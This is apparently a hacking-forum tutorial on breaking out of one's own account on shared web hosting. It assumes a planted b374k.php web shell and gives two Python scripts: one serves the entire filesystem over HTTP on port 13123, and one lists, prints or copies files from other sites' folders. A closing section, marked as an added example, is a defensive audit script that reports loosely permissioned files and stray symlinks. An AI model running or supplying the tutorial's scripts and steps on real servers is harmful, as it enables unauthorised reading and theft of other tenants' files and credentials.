
Server Bypass via Symlink - Jumping in server


As we all know, symlinking is one of the greatest methods for bypassing server security, meaning reading the files of other sites on the same shared host.
To succeed with this tutorial, the following things are required:
  • Python installed on the server
  • b374k.php shell
  • And some scripts you will see below.

This idea started with the devilzc0de geeks; let me explain how it works.

Here we are in the folder dono, trying to go into /www/.
There is no permission to go into /www.
Before we get tired of trying commands, you must check whether Python is installed with the command:
python -h
Now take this Python script and name it as , it's a little Python script that opens a new port on the server using the SimpleHTTPServer (Python) module. The default port in the script is 13123.

#!/usr/bin/env python
# (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    httpd = SocketServer.TCPServer(("", port), Handler)
    print("Now open this server on webbrowser at port : " + str(port))
    print("example:" + str(port))
    httpd.serve_forever()

Next you will need to run the script with the following command

Open the site on port 13123.

Let's go on to the next method of symlink server bypassing. As you saw in the previous post, now I will explain a new trick with another tool.

Here we will talk about another tool that uses Python's permissions to read other folders/files on the same server.
Tool called and here is the source

#!/usr/bin/env python
# (c) 2012
# Python 2 script: lists a directory, prints a file, or copies a file.
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    # Accept either paths or already-open file objects
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)

    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        # Directory: print size (or a DIR marker) and name for each entry
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)

            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            # Second argument given: copy the file to that path
            copyfile(target, sys.argv[2])
        else:
            # No destination: print the file to stdout byte by byte
            f = open(target, "rb")
            byte = f.read(1)
            while byte != "":
                sys.stdout.write(byte)
                byte = f.read(1)
            f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)

Testing the script

Use the tool to view folders you have no permission to read inside

python /var/www/index.php

View the files in a no-access folder.
python /var/www/index.php

Copy/save your file
python /var/www/indro/ketek.jpg ketek.jpg

And yeah, the file is here

Yeahh, fucking access is granted

Something you can also do with those other scripts in Perl

enjoy it :)
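
Both scripts above run as the web-server account, so they can only list or copy what the operating system's file permissions already allow that account to read. The following Python 3 audit is an added example, not part of the original post: it walks one site's root and reports files and directories open to other local accounts, plus symlinks that point outside the root. The names `classify`, `audit_site_root` and `build_sample_tree` and the sample tree are hypothetical and constructed for illustration; a POSIX filesystem is assumed.

```python
import os
import stat
import tempfile

def classify(path, root):
    """Return a finding string for one path, or None if it is locked down."""
    mode = os.lstat(path).st_mode  # lstat: inspect the link, not its target
    if stat.S_ISLNK(mode):
        target = os.path.realpath(path)
        if os.path.commonpath([target, root]) != root:
            return "symlink leaves site root -> " + target
    elif stat.S_ISDIR(mode):
        if mode & stat.S_IROTH:
            return "directory listable by other accounts"
        if mode & stat.S_IXOTH:
            return "directory traversable by other accounts"
    elif stat.S_ISREG(mode) and mode & stat.S_IROTH:
        return "file readable by other accounts"
    return None

def audit_site_root(root):
    """Walk one tenant's root; return sorted (relative path, finding) pairs."""
    root = os.path.realpath(root)
    paths = [root]
    for dirpath, dirnames, filenames in os.walk(root):  # symlinks not followed
        paths += [os.path.join(dirpath, n) for n in dirnames + filenames]
    findings = []
    for p in paths:
        problem = classify(p, root)
        if problem:
            findings.append((os.path.relpath(p, root), problem))
    return sorted(findings)

def build_sample_tree(base):
    """Constructed sample: a loose config file, a tight dir, a stray symlink."""
    site = os.path.join(base, "site_a")
    os.makedirs(os.path.join(site, "private"))
    with open(os.path.join(site, "config.php"), "w") as f:
        f.write("<?php // constructed sample ?>")
    os.chmod(os.path.join(site, "config.php"), 0o644)  # readable by everyone
    os.chmod(os.path.join(site, "private"), 0o700)     # owner only
    os.chmod(site, 0o750)                              # owner and group only
    os.symlink("/etc", os.path.join(site, "link"))     # points outside the root
    return site

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, problem in audit_site_root(build_sample_tree(tmp)):
            print(rel, "-", problem)
```

Run it as a user that can read every tenant directory, because `os.walk` silently skips directories it cannot open.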